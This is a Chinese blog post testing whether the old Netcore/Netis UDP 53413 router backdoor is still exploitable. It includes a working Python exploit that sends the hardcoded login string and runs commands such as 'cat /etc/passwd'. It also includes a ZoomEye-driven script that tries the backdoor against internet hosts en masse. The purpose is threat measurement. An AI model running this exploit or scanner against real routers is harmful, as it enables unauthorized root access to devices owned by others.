关于netcore 53413后门的跟踪

最新推荐文章于 2023-02-28 16:16:52 发布
最新推荐文章于 2023-02-28 16:16:52 发布
阅读量4.5k 收藏 2
点赞数
分类专栏: 安全工具
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/rongyongfeikai2/article/details/79135381
版权

最近听到一种说法是,有gafgyt蠕虫利用netcore的53413的后门,传播得非常厉害。

那么,跟踪一下事实是否属实呢?

1.首先看一下netcore/netis路由的53413后门

这是一个2014年就爆出来的老洞。即netcore/netis路由器会默认监听53413端口(UDP),发送特定的字符串给它之后,就可以获得root权限登录,接着就可以执行相应的命令了。

一个可以利用poc如下:

import socket
import argparse
import binascii
import time

timeout = 20    
socket.setdefaulttimeout(timeout)

'''
Example run:
root@rageKali:/media/veracrypt1/stcyr/git/MSF-Testing-Scripts# python netis_backdoor.py 192.168.1.1
Unlocking Backdoor
Quit to quit loop
Netis> ls /tmp/
AuCVM
XqdHc
bVOQm
br_type
bridge_init
cfg-macclone
checkupfile
ddfile
default_rt
dhcpd_action
file.txt
hzbjo
igd_config.old
jiDOo
log
ntp_tmp
passwd
reg_domain
syslogd_support
tmp.txt
update_main
version
wan_type
workmode
Netis> cat /etc/passwd
root:abSQTPcIskFGc:0:0:root:/:/bin/sh
nobody:x:99:99:Nobody:/:
'''
parser = argparse.ArgumentParser(description='Netis backdoor')
parser.add_argument('IP', help='IP of router to connect to')

args = parser.parse_args()


def send(command, print_response = True):
   s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
   s.sendto("AA\x00\x00AAAA%s\x00" %("ls /tmp/"), (args.IP, 53413))
   if print_response:
      resp = s.recv(2048)
      resp = resp[8:]
      if binascii.hexlify(resp) == "000000ff":
         print("No response, command not found or error in command")
      else:
         print(resp)

def login():
   s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
   s.sendto("AAAAAAAAnetcore\x00", (args.IP, 53413))

print("Unlocking Backdoor")
input = ""
print("Quit to quit loop")
input = raw_input("Netis> ").strip()
while not input.strip().upper() in ["QUIT","EXIT"]:
   send(" " + input)
   input = raw_input("Netis> ").strip()
我们随便访问一个开着53413端口的机器:


可以清晰的看到,虽然可以发送命令给这台机器,不过命令已经无法执行了。从返回命令的拼写错误来看,"commond"为误应该为command,很有可能很多机器都是打的同一个命令单词拼写错误的补丁。

再随便访问几个:


基本上都是处于打了补丁的状态。

2.自动化探测

我们知道zoomeye上提供了搜索某个指定端口开放的API,虽然是有限制的,不过已经足以方便我们进行自动化探测了。

脚本如下:

#coding:utf-8
import urllib
import urllib2
import json
import socket
import time
import binascii

socket.setdefaulttimeout(20)

def login():
    username = 'username'
    password = 'password'
    data = {
        "username":username,
        "password":password
    }
    url = "https://api.zoomeye.org/user/login"
    resp = urllib.urlopen(url, data=json.dumps(data))
    resp_data = json.loads(resp.read())
    return resp_data["access_token"]

def write_vulhost(msg):
    with open("h:/vulhost.log", "a") as f:
        f.write(msg+"\n")

def get_vulhost():
    token = login()
    PAGENUM = 1001
    headers = {
        "Authorization": "JWT "+token 
    }
    for i in range(1, PAGENUM):
        print "try page", i
        url = "https://api.zoomeye.org/host/search?query=port:53413&page="+str(i)
        req = urllib2.Request(url, headers=headers)
        resp = urllib2.urlopen(req)
        data = json.loads(resp.read())
        if "matches" in data.keys():
            for item in data["matches"]:
                if item["ip"].find("*") == -1:
                    sock = None
                    try:
                        #探测是否可以执行ls /tmp/命令
                        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
                        sock.sendto("AAAAAAAAnetcore\x00", (str(item["ip"]), 53413))
                        respdata = sock.recv(2048)
                        if respdata.lower().find("login succeeded") != -1:
                            sock.sendto("AA\x00\x00AAAA%s\x00" %("cat /etc/passwd"), (str(item["ip"]), 53413))
                            respdata = sock.recv(2048)
                            respdata = respdata[8:]
                            if binascii.hexlify(respdata) == "000000ff" or respdata.find("commond") != -1 or respdata.find("cat") != -1 or \
                                respdata.find("not found") != -1:
                                #无法利用命令
                                continue
                            print respdata, item["ip"]
                            write_vulhost(item["ip"])
                        sock.close()
                    except:
                        if sock != None:
                            sock.close()
                        

if __name__ == '__main__':
    get_vulhost()
    print "done!"

我的脚本探测了100多页之后报错,提示说没有权限访问了,估计是超过限制了。


按照zoomeye的一页19条来看,大概2000多个ip都没有一个可以利用的,也就是说可以利用的概率已经低于千分之一。

所以说这个2014年的老洞的利用绝对没有传言中那么夸张,大多数的攻击行为都是扫描探测而已,而非真实的可以利用成功。从ips告警日志看起来,很多dip都是IDC服务器之类的,连netcore路由器都不是,可见得大多数的告警都只是扫描探测行为,真实可以利用成功的少之又少。

如何从海量的扫描告警中识别出那些真实利用成功的造成危害的告警,是很多安全建模团队需要做的工作。

rongyongfeikai2
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
netcore磊科no1最全插件
04-03
netcore(No1)CN-V1.3.140618固件包自带25款插件:主机监控/WEB认证/电子公告/网址黑白名单/主机带宽控制/智能QOS/无线黑白名单/数据分流/端口映射/repeater/客人无线网络/DDOS攻击防御/dns过滤及重定向/访问控制/FTP...
Netcore-MG1200AC官方升级固件
08-16
磊科MG1200AC升级固件,系统内手动升级
Netis路由器后门3月内遭5700万次扫描
weixin_33796205的博客
07-03 152
网络解决方案提供商 Netis Systems 的路由器后门已不是新闻,但这个后门在两年曝光后之后,竟然一直延续至今。 趋势科技研究人员警告,自8月以来,有数千万次对该漏洞的探测扫描被记录。攻击者可通过这个漏洞完全控制该设备,只需知道该路由器外部IP地址,然后防问 UDP 53413 端口,接着输入固件中硬编码的口令,至此大功造成。 获取到受影响设备的完...
修改vultr服务器端口,Vultr默认禁止端口列表及申请开启25邮局SMTP端口方法
weixin_39872123的博客
08-12 2041
一般我们选择服务器,有的是用来练手学习Linux服务器,当做虚拟机使用的,有的是用来做网站搭建WEB服务器用的,也有的是用来当做软件调试工具或者群发邮件使用的。尤其是我们选择海外主机的时候用邮局服务器是比较多,做外贸网站或者音效EDM群发邮件是很多的。但是由于群发邮件在国外主机商(国内也一样)属于违反TOS规定的。所以有些主机商是发现就会禁止行为,或者像Vultr、Linode等商家都会禁止常用的...
磊科(NetCore)全系列路由器中的“疑似后门”程序
weixin_34281477的博客
12-31 1384
看近年来的路由器后门,多数是内置了超级密码,可直接登录路由管理后台,或是后台开启了FTP,可以任意文件上传下载等,再有就是存在一些很明显的“漏洞”,这些勉强也说得过去。但如果直接监听端口,可以执行命令上传下载文件,那就有点太说不过去了……这些功能是不是有点过了呢?过程描述磊科(NetCore)路由器中内置了一个叫做IGDMPTD的程序,按照它的描述应该是IGD MPT Int...
常用端口总结
甲方乙方
08-08 3830
学习web安全也有一段时间了,但是对好多端口还是有点模糊,于是今天总结一下。。。大神勿喷哟 Port information 21 ftp 主要看是否支持匿名,也可以跑弱口令 22 ssh 23 tenlet 53 DNS服务器 79 Finger 80 web 常见web漏洞以及是否是一些管理后台 111
十一、路由器后门漏洞
wanhex的博客
03-07 1422
在信息安全领域,后门是指绕过安全控制而获取对程序或系统访问权的方法。例如,即使某一款路由器拥有完美的安全防护功能和设置,但是却保留了一条不为人知的秘密通道,如果被攻击者发现,攻击者同样可以轻松进入并获取对路由器的控制权限。这时候,再完美的安全防护都已形同虚设。 对于路由器中的存在后门,成因有多种多样,有的是为了方便开发人员管控路由器而保留,有的是发布时遗留的安全漏洞,还有的或许是有人对路由器固件...
解决Netcore磊科无线路由器192.168.1.1打不开的方法
10-01
最近有朋友问我使用的是磊科无线路由器192.168.1.1,登录页面打不开,分析了很多种可能性,下面小编针对这些问题提出解决办法,需要的朋友参考下本
netcore磊科随身wifi驱动 v2.2.0 官方正式版
07-01
磊科随身wifi驱动是一款最新版的随身wifi网卡驱动软件,是面向磊科USB无线网卡用户提供的驱动安装程序。...磊科随身wifi:netcore磊科随身wifi是一款体积小巧,方便携带的一款USB无线网,欢迎下载体验
最新netcore磊科nr215p固件升级包
04-20
最新nr215p固件为2012年最新版本,更新了每步动态域名解析的协议,支持铁通宽带、移动宽带、长城宽带、广电宽带等网络的动态IP解析,支持任意的顶级域名动态解析。任意顶级域名可以通过这个路由器提供二级域名动态...
磊科235W,236W CN-V1.8(beta4).130815固件最稳定
01-31
刷 235W/236W 版本:V1.8(beta4)固件,打端口补丁:虚拟服务列表 :1 TCP5357 1.2.3.4 all 5357 5357 ALL , 2 UDP53413 1.2.3.4 all 53413 53413 ALL 可以稳定运行。 目前,V1.8(beta4)固件是最稳定的了。 磊科最新版235W和236W 1.9固件不稳定,
Netis路由器ping命令字符缺陷远程代码执行
want的博客
02-07 954
代码如下: import requests,json import re import time import urllib def Two(h,p,cmd): host = h +':' + p headers1={'Host':host, 'Cache-Control':'no-cache', 'Content-Type':'application/x-www-form-urlencoded', 'User-A
网络安全观察漏洞利用态势
m0_73803866的博客
10-16 487
9 月 7 日 Metasploit 团队公开发布了该漏洞的利用模块 cve_2019_0708_bluekeep_rce.rb,该模块以 64 位版本的 Windows 7 和 Windows Server 2008 R2 为目标,根据下图 options 的信息,攻击者需要提 供设置 RHOSTS、RPORT、target,可用于针对性的攻击。这类漏洞主要是黑客利用钓鱼邮件, 通过恶意链接、恶意附件的形式投递恶意程序,在用户点击相关资源时,对应程序的漏洞会被触发,最 终导致感染和信息泄露。
CLR via 笔记4.2 类型转换 is 与 as 区别
weixin_30765577的博客
12-10 99
is 和 as 操作符是用来进行强制类型转换的is : 检查一个对象是否兼容于其他指定的类型,并返回一个Bool值,永远不会抛出异常 object o = new object(); if (o is Label) { Label lb = (Label)o; Response.Write("类型转换成功"...
磊科路由器后门利用情况分析
m0_74079109的博客
12-30 196
Eir是爱尔兰的一家公司,NVD中只记录了一个漏洞,漏洞编号为 CVE-2016-10372,针对 D1000 这款路由器 1,由于在软件实现中没有正确地限制 TR-064 协议,远程攻击者可以通过 7547 端口执行任意命令。1 由于很多调制解调器也具备路由的功能,因此,在资产角度,我们并未对调制解调器和路由器进行区分,统一归为路由器一类。
远程代码执行漏洞
最新发布
weixin_59114667的博客
02-28 184
远程执行代码漏洞存在于HTTP协议堆栈中,当HTTP.sys未正确分析经特殊设计的HTTP请求时会导致此漏洞。
关于5357端口
热门推荐
wmjhzm220的专栏
09-01 3万+
最近因为工作原因,领导让调查一下5357端口是怎么回事儿,说实话当时心里很慌啊。。因为本身网络方面做的少,不过调查了之后还真有收获,这里记录一下,免得忘了。 先说说如何查找5357端口是被哪个进程占用吧,废话不多说,直接上图: 打开cmd,运行命令:netstat -aon 这里发现5357端口处于监听状态,监听的进程PID是4,打开任务管理器
关于asp.netcore mvc(从入门到精通)
CrtLife的博客
05-24 2624
MVC开发 什么是MVC? V:视图------呈现给用户看到的内容(表现层) C:控制器----控制业务逻辑计算,调用服务,选择返回什么内容,可以返回视图,JSON,字符串等等 M:视图模型—用作控制器和视图之间传递数据的载体 cshtml文件:其实是一个类文件; 当项目启动时,解决修改视图,不能立马生效问题? Nuget引入:Microsoft.AspNetCore.Mvc.Razor.RuntimeCompilation 在startup下的ConfigureServices方法中添加servi
NetCore编码规范-ABP篇.docx
12-08
NetCore编码规范-ABP篇

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值